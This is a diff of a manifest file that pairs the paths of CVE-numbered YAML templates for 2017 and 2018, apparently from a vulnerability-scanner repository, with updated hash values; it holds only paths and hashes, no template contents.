+http/cves/2017/CVE-2017-12611.yaml:bffb1d01152c13c599bbc09823ba98688f96cfd6 +http/cves/2017/CVE-2017-12615.yaml:c243c9b300417c8cfbd8227f5fbd80234e33c653 http/cves/2017/CVE-2017-12617.yaml:1b2d376433632693d5ccf4cd62fadaa5c6f4eef6 -http/cves/2017/CVE-2017-12629.yaml:856821d61fc3c8943a6ec07e0cbf58b5214be3ee -http/cves/2017/CVE-2017-12635.yaml:23d885c9b0bc5d4d3355f38788684d52ba2ba862 -http/cves/2017/CVE-2017-12637.yaml:eb79d7e96b55bf793dc9392394ca7c41df6c1a6f -http/cves/2017/CVE-2017-12794.yaml:894a78634745a021e842f1979457fd5bde8309e5 -http/cves/2017/CVE-2017-14135.yaml:6b7ce25bbb367d691cd8e4bcd776cc84f2f7eded -http/cves/2017/CVE-2017-14186.yaml:42dd996ce75ec7dd22b0c10797dcadfbf030730c -http/cves/2017/CVE-2017-14524.yaml:f86bf454230b866059674cb379417cd86eca14ff -http/cves/2017/CVE-2017-14535.yaml:e673813375daa97f0255566e147406d850062b0a -http/cves/2017/CVE-2017-14537.yaml:3bd7f8c2bd802137fcffed2a7829dd6b87f9df1b -http/cves/2017/CVE-2017-14622.yaml:9a3a2f5582d68236642cc91544da75d762bb6cc2 -http/cves/2017/CVE-2017-14651.yaml:93b3c0c7ad29f9c6927abcf6102d5ab8c3101037 -http/cves/2017/CVE-2017-14849.yaml:f8fe3531a90025f2464a72474d1eb40ab85f7445 -http/cves/2017/CVE-2017-15287.yaml:1f4c62130aee8bb9f471479a904b1fe0563840b3 -http/cves/2017/CVE-2017-15363.yaml:a3abe3bdbd36da8ab34cfd8129a108262eb92cb5 -http/cves/2017/CVE-2017-15647.yaml:577456baad04c6e86285fc682f9a1d7a5a67d4c0 -http/cves/2017/CVE-2017-15715.yaml:347f54b58b7279a20c497abf9f9e59e47f303c6c -http/cves/2017/CVE-2017-15944.yaml:ab8873fe218a34c0ef29dda41d8d316a6fca2445 -http/cves/2017/CVE-2017-16806.yaml:85f9d2501624970820e4938e00d3fde9a04530d1 -http/cves/2017/CVE-2017-16877.yaml:c19cf49f3d48ae5f5a3509a20130107ca156c0a6 -http/cves/2017/CVE-2017-16894.yaml:488d32cb10d68c951476840065c09de362bcbe55 -http/cves/2017/CVE-2017-17043.yaml:fd50cf646420eb8486de49ff5fc69d633e50b24e -http/cves/2017/CVE-2017-17059.yaml:849cc1a303bb2e88c333d50ef163a2b57e1eb611 -http/cves/2017/CVE-2017-17451.yaml:f310e809fac25bac71952a5e51953e068311fe1d -http/cves/2017/CVE-2017-17562.yaml:a32a7c5aa1f09b222fa0bb67ad67200e9e0d8cb6 +http/cves/2017/CVE-2017-12629.yaml:5fa515ea099e1f2b4a79a7b18432a9e37dbb1f8f +http/cves/2017/CVE-2017-12635.yaml:e397d49906649a55b0ab831547b947a110b338e7 +http/cves/2017/CVE-2017-12637.yaml:d14486899bdd7cee59d0a944b9543772b47032c8 +http/cves/2017/CVE-2017-12794.yaml:0b47fa03e2f3f55dd7056022f12ed647c135cd0a +http/cves/2017/CVE-2017-14135.yaml:f021436fa39fd1327e109e4c4ffaaa4ebca052b0 +http/cves/2017/CVE-2017-14186.yaml:b61d4ef592bca2be6816c683dda19db377dada52 +http/cves/2017/CVE-2017-14524.yaml:060a02e5c7a675f98b6dfad656854594b4e510b6 +http/cves/2017/CVE-2017-14535.yaml:8efcba9a644a5a5adc00e4e9bbc227cc5f184c01 +http/cves/2017/CVE-2017-14537.yaml:2e6f01d13b98da1cc8a453007578dcc8d5c55b55 +http/cves/2017/CVE-2017-14622.yaml:8c1e6085d0f4507e204e1ad96d4bdfca403ba041 +http/cves/2017/CVE-2017-14651.yaml:f8bb488e3096c24231dd2a58246f1796ca399797 +http/cves/2017/CVE-2017-14849.yaml:3eb2ce9597fae79634320d76cf827b93b3571009 +http/cves/2017/CVE-2017-15287.yaml:644ba95897e1eabd89401eb2047cbf23b02bcde2 +http/cves/2017/CVE-2017-15363.yaml:74fd3d8715c4774fdda3bf19c88161e420c9ede0 +http/cves/2017/CVE-2017-15647.yaml:d8e975b82bf699ae11ef4df028701605a51e1699 +http/cves/2017/CVE-2017-15715.yaml:5b0ea2ee95323097be588a3d32c40d3b323334c9 +http/cves/2017/CVE-2017-15944.yaml:1679672fd055689607cf4c9f1cfc4db7bb666c2d +http/cves/2017/CVE-2017-16806.yaml:d0230cebe2708f277ade71498c5a63c0283057da +http/cves/2017/CVE-2017-16877.yaml:6a462855ed8e2ec91e130ff83f69e7abb89ed818 +http/cves/2017/CVE-2017-16894.yaml:75d502bcc2845395ce31704cc46dbcfdf02179eb +http/cves/2017/CVE-2017-17043.yaml:9f006c484f97287040ec7b8302ec806b957252e8 +http/cves/2017/CVE-2017-17059.yaml:6c950227c06da43f42e7dc852eab144a1c6c619f +http/cves/2017/CVE-2017-17451.yaml:ebb4fb9ab515a3a1f1392a2d140d53dde1d1a57c +http/cves/2017/CVE-2017-17562.yaml:ec2dd50f75fb840eaa21c3ff4df77329d37b0d5b http/cves/2017/CVE-2017-17731.yaml:7448440ba15ad2229bda586f8057c5c40c9e7461 -http/cves/2017/CVE-2017-17736.yaml:48c86673815888dd8136428145ee842d80a3a8a9 -http/cves/2017/CVE-2017-18024.yaml:5f2310dbb6a722423eed4e581d6506e8af304ce8 -http/cves/2017/CVE-2017-18536.yaml:4978ca65e54db6ca38578af479d7a611c3d37deb -http/cves/2017/CVE-2017-18598.yaml:1f38be6cf6d35f18b2413dbd025bbec6898b0326 -http/cves/2017/CVE-2017-18638.yaml:44c4e48ab6119f12e7c9b47d112d00f57ff8a58c -http/cves/2017/CVE-2017-3506.yaml:0933022be7805e458cc0d68f6e0e43ed6d6478f2 -http/cves/2017/CVE-2017-3528.yaml:a3a85151e8d698806472069b580bd187d7d197ab -http/cves/2017/CVE-2017-4011.yaml:167dcb7e8a03f1c0d4e585fb273eb33885e5c24d -http/cves/2017/CVE-2017-5487.yaml:02111d8230f57161d17f9a5f3984bcaed9563cb4 -http/cves/2017/CVE-2017-5521.yaml:76114b8b0f786746cfc77c16e64553eaceb91ad0 -http/cves/2017/CVE-2017-5631.yaml:0f69370d759e590e9b0685b4f10ae7d4b2d2e2b7 -http/cves/2017/CVE-2017-5638.yaml:1fba0de82787af2c4ca0d0e750459e93ac1a09e3 -http/cves/2017/CVE-2017-5689.yaml:7cd7ae17afb47ab81348076a67450c5380c5a50a -http/cves/2017/CVE-2017-5982.yaml:b991b6e0e208e20e6e115afb561508844937346f -http/cves/2017/CVE-2017-6090.yaml:631c7f98524cd6ab23d53035f7b2e59e97a6751c -http/cves/2017/CVE-2017-7269.yaml:6ee6f5c6fb12d779ec4dc6337b6e5429336312b9 -http/cves/2017/CVE-2017-7391.yaml:4efe04bc173535835a52ea0db7f94afffb5e20fc -http/cves/2017/CVE-2017-7615.yaml:28c2d956681f291bfadb6ef743be0314b7904888 -http/cves/2017/CVE-2017-7921.yaml:8d492d6e3b947372fa5d265302b64e605ea7f1ac -http/cves/2017/CVE-2017-8917.yaml:ac6390d1f961a9a1969932e17403939fb8000e54 -http/cves/2017/CVE-2017-9140.yaml:01c2f3364b5c2b2b2767a025084add6488690226 -http/cves/2017/CVE-2017-9288.yaml:f20e6d72a331c8d57d8eeb63e865c81b336a2f99 -http/cves/2017/CVE-2017-9416.yaml:1ab43c4937e600f73ee194b2910fde8c95801b52 -http/cves/2017/CVE-2017-9506.yaml:14cfce197664ea6cad7787d568b58f8f1f3ce048 -http/cves/2017/CVE-2017-9791.yaml:4cbd11b8d753d95df7974aa62a6438e5daa0a063 -http/cves/2017/CVE-2017-9805.yaml:4b809828373de8cde0f86fe1b1c60789bfe3a275 -http/cves/2017/CVE-2017-9822.yaml:aac13d49174fda813c682001f3d87a94347b3cce -http/cves/2017/CVE-2017-9833.yaml:bbd8df603a03fee1f66086cc8e0ac88b55728fa5 -http/cves/2017/CVE-2017-9841.yaml:fdf35892d4b5566dc4901e936b7d90840ec071cc -http/cves/2018/CVE-2018-0127.yaml:a8d0f2e2eb316333299ee15075952d53e15c648f -http/cves/2018/CVE-2018-0296.yaml:16877e5716f2c16a154f20c9387850dea9cb0893 -http/cves/2018/CVE-2018-1000129.yaml:fb75f0e1a947f8bf3856cb9ed4ea1631196830b2 -http/cves/2018/CVE-2018-1000130.yaml:ba5c76592290f39adee2606c699657ceb97aa5ad -http/cves/2018/CVE-2018-1000226.yaml:af10a4b002cc09a5800f5d7687ec728f73689102 -http/cves/2018/CVE-2018-1000533.yaml:9efb75836e1dda254d3dd2d4852495fcfa332fb6 -http/cves/2018/CVE-2018-1000600.yaml:6003a9e4ac50cd7b5aed7fa13c1291e7f610ffb1 -http/cves/2018/CVE-2018-1000671.yaml:448f8c0451bab6d12babfed770daf9243ea85539 -http/cves/2018/CVE-2018-1000856.yaml:c2631ddb1648b6904aa78d8332ac5208a422575d -http/cves/2018/CVE-2018-1000861.yaml:ef8fe7562788ac3dae22c98e78af08f08ac2dad9 -http/cves/2018/CVE-2018-10093.yaml:1f5b631b63f8a43297df4eb185866f77e8e31d87 -http/cves/2018/CVE-2018-10095.yaml:5a75e1736c63ae5de580036d246a2c36f4535d1b -http/cves/2018/CVE-2018-10141.yaml:9eb162cb9b700d34925f89be6b897b7b65085f16 -http/cves/2018/CVE-2018-10201.yaml:0b9782a32f5c2e72f9a8f69319b1549f2237f36c -http/cves/2018/CVE-2018-10230.yaml:23256122977b136bc79482e13cd5f228d5809fc3 -http/cves/2018/CVE-2018-10562.yaml:9f7546ad442359c9514caa5a40c7b8ed730b4754 -http/cves/2018/CVE-2018-10818.yaml:6498291625ef8ef257843ec8273fd2507c58f972 -http/cves/2018/CVE-2018-10822.yaml:8d9c246c0c98f744a4e595720de860f47f526ff1 -http/cves/2018/CVE-2018-10823.yaml:aaec17f4f1529810836aba2e5fa29a33b47f508b -http/cves/2018/CVE-2018-10956.yaml:a83a2500d488ad8d8a28b82f1fd2b27460322537 -http/cves/2018/CVE-2018-11227.yaml:b3e5bc5654e6fd2a17ec05b2b5c7d586e5e56404 -http/cves/2018/CVE-2018-11231.yaml:69789c788210c192f98c9ada3173b938e388a144 -http/cves/2018/CVE-2018-11409.yaml:0d8b7037344835721f8dd38da6050ea8d8915b26 -http/cves/2018/CVE-2018-11473.yaml:80fad9b046becd21dcc63f63ed74ce1876a3d200 -http/cves/2018/CVE-2018-11709.yaml:16c64a3342c90d85d2a6ebb93aac58166d2b0bb6 +http/cves/2017/CVE-2017-17736.yaml:a02088e1da681edcc1854f35691e87bda67374cf +http/cves/2017/CVE-2017-18024.yaml:0db5095e897ae7a3e38c307af3813b5b8f3533ef +http/cves/2017/CVE-2017-18536.yaml:36b6d8d2168e9fb9c13b69045b568834c415f1cf +http/cves/2017/CVE-2017-18598.yaml:986a6680baac0a946d0b839ea93c7c7d289dcaf3 +http/cves/2017/CVE-2017-18638.yaml:4855dd2865ebaf6430abcc26488f3d1a0c6dc4fc +http/cves/2017/CVE-2017-3506.yaml:0b95674f6644c719a20934b469366cbc2dedd04d +http/cves/2017/CVE-2017-3528.yaml:6d2b2d5bacb00e33a736e5c503b0cb5abecba59a +http/cves/2017/CVE-2017-4011.yaml:fd4d89b5eaa6b4c467fbd434856843b2f2f8f0b9 +http/cves/2017/CVE-2017-5487.yaml:848b395c2cb7bb3ce85706fac96fe29ba56d3b58 +http/cves/2017/CVE-2017-5521.yaml:ac43ea22278e02db3aae8df7707707ea505a7d3b +http/cves/2017/CVE-2017-5631.yaml:8e5c9add517e1c92cf18e262f5c54aa2e21970c6 +http/cves/2017/CVE-2017-5638.yaml:a8a8be3e4eafa9828e4cfb78f3680b5cca044c86 +http/cves/2017/CVE-2017-5689.yaml:c3d9a497951badd6bfd7eb0b5698494b4d9ed53b +http/cves/2017/CVE-2017-5982.yaml:b34af65a09380816a2d8b30198b2573a7eb2c3b3 +http/cves/2017/CVE-2017-6090.yaml:ec6a7643fecd98ae00888c9ef9208bf5b0b21e44 +http/cves/2017/CVE-2017-7269.yaml:40073c83d1b9390feea64815c90f39d736044f58 +http/cves/2017/CVE-2017-7391.yaml:ea764424e00f744c19aeef7a50a56eba7d474a33 +http/cves/2017/CVE-2017-7615.yaml:479541076f4f194a52bb93f50c395e9790e540b4 +http/cves/2017/CVE-2017-7921.yaml:6ffb07406a19da1b9306f4afe97b14ea72ebc2ba +http/cves/2017/CVE-2017-8917.yaml:a1d8ea3bf9c6a30a76d08813010b04e8a22bb04c +http/cves/2017/CVE-2017-9140.yaml:9d297258c7642647b1417db7a720afc3c914dd69 +http/cves/2017/CVE-2017-9288.yaml:af076c38932b1e78884acaf6299b47fad35b861c +http/cves/2017/CVE-2017-9416.yaml:34916a6068b0f5cc2a00e4c80b95a9a9e20e0c85 +http/cves/2017/CVE-2017-9506.yaml:80fb2b48fce86e776ad5dc6a451f9a290f3b5b91 +http/cves/2017/CVE-2017-9791.yaml:4645caaddca49ca70ccd54dc718cc12f1b039315 +http/cves/2017/CVE-2017-9805.yaml:3df38d0ef702332a5937300061cfcd1ddb70341e +http/cves/2017/CVE-2017-9822.yaml:a261e61b06a0e364ab0cd6e47645570996a6e8c4 +http/cves/2017/CVE-2017-9833.yaml:c7633cef2268ec9045556abc1103d3ad1a79a4a1 +http/cves/2017/CVE-2017-9841.yaml:e92b81a7901c140f6bcdee25ea43b19cb80b6738 +http/cves/2018/CVE-2018-0127.yaml:4cd4bf7e4942969d29c73f5cca03b99455395a5e +http/cves/2018/CVE-2018-0296.yaml:daa2a1e8e07ada6368488f256a57ed714f49dd81 +http/cves/2018/CVE-2018-1000129.yaml:35a4d85584963e7c0cf71bc8bc3f5b317c3cb165 +http/cves/2018/CVE-2018-1000130.yaml:7c16c0cb35e237e8a5f4c4ed3f92f4faef2bf925 +http/cves/2018/CVE-2018-1000226.yaml:26b57d4ab3c674bd21d497ff2e8e6315b59945c2 +http/cves/2018/CVE-2018-1000533.yaml:6e7a1c71094ee61023fd75661faa2a99d5e0ff06 +http/cves/2018/CVE-2018-1000600.yaml:451692d6f149fedb749d6fa3ecca5b0471d7ad53 +http/cves/2018/CVE-2018-1000671.yaml:b2c30295f29f918bd608e47d5a388d70f7c03cb8 +http/cves/2018/CVE-2018-1000856.yaml:4baa7be77deb3ac29ff17e3149b64735c5e16ae0 +http/cves/2018/CVE-2018-1000861.yaml:db5cf168ed228e2e72ea60179628aa9f1d5639c3 +http/cves/2018/CVE-2018-10093.yaml:82c57b99e96fcfc3643db2faab524815c88e2ff7 +http/cves/2018/CVE-2018-10095.yaml:ea43cf6331651911a67db8832a657e67bc48770f +http/cves/2018/CVE-2018-10141.yaml:b01087a037c47c6dccf4a7bf915c1cfc0abec800 +http/cves/2018/CVE-2018-10201.yaml:4fde64dfdf705a9f43a940d1482bdd0f882dd7b1 +http/cves/2018/CVE-2018-10230.yaml:05b2f9dbd1e7f515d6fd4df0872e903b12dfba53 +http/cves/2018/CVE-2018-10562.yaml:4d24d8b46ca86e4b7e50bb741405245aca8ad8fc +http/cves/2018/CVE-2018-10818.yaml:916000b7fac01e1e089f7fdcbe6060c50c7dbb0f +http/cves/2018/CVE-2018-10822.yaml:45cc6a5406566cd535a93eddf1df120ef961bd42 +http/cves/2018/CVE-2018-10823.yaml:d7e402ce15ae6d463215d3c1545c7c0c20c98ef8 +http/cves/2018/CVE-2018-10956.yaml:9ea710efac89ea94b80c86acb93aa2a86d183600 +http/cves/2018/CVE-2018-11227.yaml:50549f544be43925c9066395c5e2fb8a8338ea16 +http/cves/2018/CVE-2018-11231.yaml:60f2f8980f45bd191ec8ef5fcd84be48f4de4e2e +http/cves/2018/CVE-2018-11409.yaml:be3d1fcab5d4250ee55824093308cda01ef83794 +http/cves/2018/CVE-2018-11473.yaml:e6e0a3859868f864adc6a94ea1ff6577a8c6bfa5 +http/cves/2018/CVE-2018-11709.yaml:da113c86652f969ba3268f5b9440c720653be2ee http/cves/2018/CVE-2018-11759.yaml:ef8fdd315dd7e186c3ca698af5988e95d3c9e9ed -http/cves/2018/CVE-2018-11776.yaml:d15fb8e74019abe7bfe836feecb17a8ff6ce2d80 +http/cves/2018/CVE-2018-11776.yaml:488329be3bd3c725ae37856332fd37959acb0e64 http/cves/2018/CVE-2018-11784.yaml:3d254defa1ae5e63cd20f254f73b63bf32c2f99b -http/cves/2018/CVE-2018-12031.yaml:b7b43efae9f12161fb27d52fb0927082eda1c4e2 -http/cves/2018/CVE-2018-12054.yaml:99ab3559663dd1f240b6fbb96aded26dff461543 -http/cves/2018/CVE-2018-1207.yaml:b7e2acce8a2f2cf0c3e0f5102ec7fecd91c9a37a -http/cves/2018/CVE-2018-12095.yaml:0c4adbb93f420ac24b5b23a680c8a92d4f1e7083 -http/cves/2018/CVE-2018-12296.yaml:e3c2673f672fbe7f662f01d288ff743ded153378 -http/cves/2018/CVE-2018-12300.yaml:fd6a90f33c0682c395092e1835410568b8e8538f -http/cves/2018/CVE-2018-12613.yaml:8ec83531191cb88dbbda6bd7e4200a452bde6ba3 -http/cves/2018/CVE-2018-12634.yaml:c6d83a21b6c94d7b02f82ed73fd2c3f3031a02fd -http/cves/2018/CVE-2018-12675.yaml:5f93e774ff59c750ccd4b0882eafb82825f45449 -http/cves/2018/CVE-2018-1271.yaml:26db9fab8f10736b3c948323a4e9d3ec10f7f533 +http/cves/2018/CVE-2018-12031.yaml:b343162d6ee2533a067ca984e8e304ae1eb37e28 +http/cves/2018/CVE-2018-12054.yaml:f8c31f0824789045b9e29b6ffe527bcf4cf5f7c1 +http/cves/2018/CVE-2018-1207.yaml:c026955fe12bf02d10d0051c6bc1db38101091b5 +http/cves/2018/CVE-2018-12095.yaml:7c553aa9dd83e92569a755de7a3cc4fe4853faa1 +http/cves/2018/CVE-2018-12296.yaml:cb63338dd3e0b2aacdf0fd3db25fccf14e37ec9d +http/cves/2018/CVE-2018-12300.yaml:414f7ce7ed243983ea8dfcdfe4a4060ebcf0c538 +http/cves/2018/CVE-2018-12613.yaml:0cd4250c1485c9bf4673041de7a94334d65b0066 +http/cves/2018/CVE-2018-12634.yaml:c5fbdae9d9fd2ec55e4d8d864bba87011275f9c4 +http/cves/2018/CVE-2018-12675.yaml:9c9a94dfb5e170bfdcc46f06daa3181b06e9a087 +http/cves/2018/CVE-2018-1271.yaml:ec35214c9d731d8278944505e5e605b3a0d718d9 http/cves/2018/CVE-2018-1273.yaml:52cac66d6c77031c860524de34756486420dbefe -http/cves/2018/CVE-2018-12998.yaml:913a59d2c8d7a679084dbee9d5ed82d675c13fc4 -http/cves/2018/CVE-2018-1335.yaml:5d3d8ac6219f362cdc6d2f0aafa488b449d503e8 -http/cves/2018/CVE-2018-13379.yaml:de9db19b75ae8b18848e6b65d6b8bca868af2477 -http/cves/2018/CVE-2018-13380.yaml:a9dcfda2a76014231540a01f164ea633b331ce80 -http/cves/2018/CVE-2018-13980.yaml:90ade306278c248dd7eedacbf1bf84f3916118cb -http/cves/2018/CVE-2018-14013.yaml:eb873e93c2e1acdc5eeaac0057e1a218579c7996 -http/cves/2018/CVE-2018-14064.yaml:b4f3578ca76055fb5f4e8a627351827bb580305a -http/cves/2018/CVE-2018-14474.yaml:a2d8465a6534b454372c7d7ae9176ec2b5905118 -http/cves/2018/CVE-2018-14574.yaml:b6f5f0610bbfb5fe2f60b98113356fce045d1d44 -http/cves/2018/CVE-2018-14728.yaml:1353dcdfc2dafb580b0261924a6f5d07c3332fb6 -http/cves/2018/CVE-2018-14912.yaml:a4f9c049c3c783fb3275b425c1ad82218fac7238 -http/cves/2018/CVE-2018-14916.yaml:86b9eeb057f716547468a4f5656d80f9e15d883f -http/cves/2018/CVE-2018-14918.yaml:fee5070bc5e41f6702cc204d46f0f65221efe077 -http/cves/2018/CVE-2018-14931.yaml:13891f650530f5f747312cc3ec9caf852442f038 -http/cves/2018/CVE-2018-15138.yaml:e1762bce59146cba5720b9f0f5c64e90fe38398c -http/cves/2018/CVE-2018-15517.yaml:f7ade42137cc43d68103d08d93af45eaf725824d -http/cves/2018/CVE-2018-15535.yaml:7626b25cf13c17b5688e89f279f3653033a85139 -http/cves/2018/CVE-2018-15745.yaml:655497edd72a1c17e19dfb70c39503543feba682 -http/cves/2018/CVE-2018-15961.yaml:08829ea728a1c7a3b34a17ea5874d7843f9c40cd -http/cves/2018/CVE-2018-16059.yaml:0659dfc86080727aeb5317cc58ab05c298f753c1 -http/cves/2018/CVE-2018-16133.yaml:810b6414632460597495045ce699ddfb6f193f48 -http/cves/2018/CVE-2018-16139.yaml:745e952878320d4d6d06cc2a8631013ec344a759 -http/cves/2018/CVE-2018-16159.yaml:6ad3a674ed8101aecc7567ef09260a8822c399ac -http/cves/2018/CVE-2018-16167.yaml:25dfb69b45c8639257014e7f49e72857a5dbdfd0 -http/cves/2018/CVE-2018-16283.yaml:29e465b4be243bc62d98c5a45253da8ed1d39907 -http/cves/2018/CVE-2018-16288.yaml:dabb3c775815bd0fefc93e7e11d66e0467354923 -http/cves/2018/CVE-2018-16299.yaml:25cff0ff8c39dbc3259c289a4271ab99a77c0407 -http/cves/2018/CVE-2018-16341.yaml:81a621d89179a87b33eb932d0fa86937e82f6369 -http/cves/2018/CVE-2018-16668.yaml:d575965386acc102de77105ef3e3d54e5119a489 -http/cves/2018/CVE-2018-16670.yaml:9e4c122cdcd11ed2d9cfdedb51907cedb35a9723 -http/cves/2018/CVE-2018-16671.yaml:ee7b4e017afe52614e96236b600b9c085535184e -http/cves/2018/CVE-2018-16716.yaml:0e92c0d7a52a71f2b40130dba3cd2e476cf12e95 -http/cves/2018/CVE-2018-16761.yaml:55d7c04977016d94f6f785d5decca9d9d4d67246 -http/cves/2018/CVE-2018-16763.yaml:5763f3b847f4c6a2b8e84df78d651335ff80ee79 -http/cves/2018/CVE-2018-16836.yaml:7440b1355d30937fc0a6e46ab87226397e5012d3 -http/cves/2018/CVE-2018-16979.yaml:0dcd321aa2d8ed966629ae9177fe26e6537257dc -http/cves/2018/CVE-2018-17246.yaml:b5a9a529b1e59025c60bbf6b177a3aaf21ed751d -http/cves/2018/CVE-2018-17254.yaml:89aa84135f4d2a42387cb27eae3d11bfa7188174 -http/cves/2018/CVE-2018-17422.yaml:c0d5cc799fbc5cf968c1958d7472e0b94b8a7a4f -http/cves/2018/CVE-2018-17431.yaml:87feaf1d0e3cd1c3ccc23aba7d742b72977ae2e8 -http/cves/2018/CVE-2018-18069.yaml:f4f7c4d37c5ed2db43c609d214811eb606c9de2e -http/cves/2018/CVE-2018-18264.yaml:e53cfe2ca1e8a1bfb73bd150e7aa4a3c40f5d2fe -http/cves/2018/CVE-2018-18323.yaml:b6f3792109d71c9144732648b256c8a16a083f0e -http/cves/2018/CVE-2018-18570.yaml:a7faf0336410cec0ed1562858c7eee499f1d22f7 -http/cves/2018/CVE-2018-18608.yaml:353d45f3d62809b6587cd71979d7a038a232fc96 -http/cves/2018/CVE-2018-18775.yaml:5dab36ab069030d9bb8a02c9c8fda0deb4825448 -http/cves/2018/CVE-2018-18777.yaml:2dba96590cc6a6f58441542f0a286defe8b2c126 -http/cves/2018/CVE-2018-18778.yaml:06c0a3f12f5c4ea1643a7f4c4ddd979de5aebe83 -http/cves/2018/CVE-2018-18925.yaml:e97abb53ad8dca0160ceaf8070e067fe37561772 -http/cves/2018/CVE-2018-19136.yaml:70e20c24061c8c0998cc9acfe3cb5179a611d908 -http/cves/2018/CVE-2018-19137.yaml:fe19909327070db9362f0c001072f65f32ba0df5 -http/cves/2018/CVE-2018-19287.yaml:52a870f27bf2b6f0e9f440065458dae5405fcc07 -http/cves/2018/CVE-2018-19326.yaml:e81cb3cfdaccb565693c6e742896735584e77e49 -http/cves/2018/CVE-2018-19365.yaml:800459337af8a592f8ff207af27aa47121e19a43 -http/cves/2018/CVE-2018-19386.yaml:f8f2b877d2fa91ac11ce75248b2b814816359e7d -http/cves/2018/CVE-2018-19439.yaml:8cf9de1027bb950b584a95f32ab3afe63e39b539 -http/cves/2018/CVE-2018-19458.yaml:e4e04e3bbe327a7cc05199cb55dae47ebd623e46 -http/cves/2018/CVE-2018-19749.yaml:ab6f950396175eaf28048b6198464b61dd64cc14 -http/cves/2018/CVE-2018-19751.yaml:21b3ca405fb20e20f10dfda150c3f38d37eeb9c8 -http/cves/2018/CVE-2018-19752.yaml:7c40da05c37bc3ebf08d031b29b2273dd67c4010 -http/cves/2018/CVE-2018-19753.yaml:4fd11cfaa3bf2554e434b62f2a96e9545e01e803 -http/cves/2018/CVE-2018-19877.yaml:0dd094bf6c16c7a4dc7c8d1fdf01c10f000fe7b6 -http/cves/2018/CVE-2018-19892.yaml:4e322c56140d7259e545e8c3000dbae34774a53d -http/cves/2018/CVE-2018-19914.yaml:7a2aa9fe0a50a94afd399591f4cacf6c9c44fe25 -http/cves/2018/CVE-2018-19915.yaml:dc2630e4405c8f4b14b69f1787227de4e7bbd745 -http/cves/2018/CVE-2018-20009.yaml:299bde94a1390738b4d99b40f176478c05f34491 -http/cves/2018/CVE-2018-20010.yaml:2d9f2499a3510702a98c357e04100ca7152b5e52 -http/cves/2018/CVE-2018-20011.yaml:c7c1e243e2adccf5d4e2f2743f40c8466f37a55a -http/cves/2018/CVE-2018-20462.yaml:4ac4ea366a333ff4b7862a2f52bc3d8b9328911a -http/cves/2018/CVE-2018-20463.yaml:ccc5b4e0e2750b5c21f922b928d39617b3c04b73 -http/cves/2018/CVE-2018-20470.yaml:a6bd3317cb74e44ed88b9ec6699a881b69330d28 +http/cves/2018/CVE-2018-12998.yaml:dbcf43eb12d4780df34d4819fe9dbdafa2304a6a +http/cves/2018/CVE-2018-1335.yaml:75b61f2c438543a1d6ee5d4f49df6f7df6f17098 +http/cves/2018/CVE-2018-13379.yaml:b054adc30064130928f7f1ae220409e6af0d0c1c +http/cves/2018/CVE-2018-13380.yaml:7496e9d6d096d861dc3c1906b46d8d2d8b1fb50d +http/cves/2018/CVE-2018-13980.yaml:56b32dba07643d9707ecc329c7f248bc0bfc9834 +http/cves/2018/CVE-2018-14013.yaml:9e7deb8e8ee0bd37db995c8e626097c88168bf82 +http/cves/2018/CVE-2018-14064.yaml:6297350ce056027061c010961cc777a07b3861d5 +http/cves/2018/CVE-2018-14474.yaml:f4cbf27dc43f1b36c14492a4ce478e27acc65a86 +http/cves/2018/CVE-2018-14574.yaml:8ac0680428b7775120332d58c841f1e475223333 +http/cves/2018/CVE-2018-14728.yaml:03c517d754ebba14cc2386d155c6d0ed195b3489 +http/cves/2018/CVE-2018-14912.yaml:2bcb7ec3378e7cc8e3db73bffee9e043dd47d03e +http/cves/2018/CVE-2018-14916.yaml:c47d7e49d25a11e227965f8a53eaa0fdbccbcaeb +http/cves/2018/CVE-2018-14918.yaml:1cbef97b8cffd400bc7d486f5d3c9fe0a5f8db53 +http/cves/2018/CVE-2018-14931.yaml:8ae84ffcb4b60689582251f9557e3b5aaf1557e1 +http/cves/2018/CVE-2018-15138.yaml:6ddbeee1685621cdacebd4e9f03ebaafc8c3d263 +http/cves/2018/CVE-2018-15517.yaml:e0bef757412a30eba89f7ac34f2b0c6385af76ba +http/cves/2018/CVE-2018-15535.yaml:5c0308bd20f45ae9d948da60ddba372c2ee73d48 +http/cves/2018/CVE-2018-15745.yaml:e3f2830bbffa0127df73984dcb23ff7c90b0e7ba +http/cves/2018/CVE-2018-15961.yaml:8100272231f318d99fc8583293bcf1551f1ac84e +http/cves/2018/CVE-2018-16059.yaml:81b5e95022bf198b4104481f8ed2b045de1c9660 +http/cves/2018/CVE-2018-16133.yaml:f191f9ccf7a8a91f060b3468b9fe3869d7af9c68 +http/cves/2018/CVE-2018-16139.yaml:623e40740db66de9bf1de0d16b82a8383d657c94 +http/cves/2018/CVE-2018-16159.yaml:e88ad149ecf6d15580f03da2b2c41c5f5579f6a2 +http/cves/2018/CVE-2018-16167.yaml:d95790be2ea7fc868fc2fb76356d1b38cb8ef214 +http/cves/2018/CVE-2018-16283.yaml:95953621be4384f4304bbacc49fa3223b3ffed8f +http/cves/2018/CVE-2018-16288.yaml:24b2adaf387313f9ede4898b795a6178efd538b7 +http/cves/2018/CVE-2018-16299.yaml:ae97dbaec518978225f85763a0e38fa73924174a +http/cves/2018/CVE-2018-16341.yaml:f2242eb9ce97332e5fc9505ecdfdbb26d2fe6fdd +http/cves/2018/CVE-2018-16668.yaml:161b13735679c6564d3b068e2de69fc88d906b88 +http/cves/2018/CVE-2018-16670.yaml:5741dfdc4f3d22e02dd0844ae12c73986783d84f +http/cves/2018/CVE-2018-16671.yaml:b8a473ff221645de7c6a5489e107d2ce3af18ebe +http/cves/2018/CVE-2018-16716.yaml:b7392207be50e7ef84a98ef07b53d749305dfb5f +http/cves/2018/CVE-2018-16761.yaml:85717c61256c8f491498e91e5ff37b4665b96c45 +http/cves/2018/CVE-2018-16763.yaml:bf613491c1ad7d36dc19b453a7d66872904357ff +http/cves/2018/CVE-2018-16836.yaml:caa0ee69a24076af2dc87eafa65ddc9cd9b65d6a +http/cves/2018/CVE-2018-16979.yaml:5204b8c40b5b15050667ce7e91bceeb4fc809845 +http/cves/2018/CVE-2018-17246.yaml:7d4ea5305154b775e7492fb4e8ae30737e005749 +http/cves/2018/CVE-2018-17254.yaml:2b5ff8a11697cd3818bd851c098b2844118b6f83 +http/cves/2018/CVE-2018-17422.yaml:59750e0d7ef2b1590aac21b3cf7ace7bb5047628 +http/cves/2018/CVE-2018-17431.yaml:e734e896cd2ee6e280a123c7f7ab6ee3601b457b +http/cves/2018/CVE-2018-18069.yaml:8d372483db1a6a84ccfdb227e5a33b61d421ae1a +http/cves/2018/CVE-2018-18264.yaml:e21bb9838711b6034b58214ace65542749f348d5 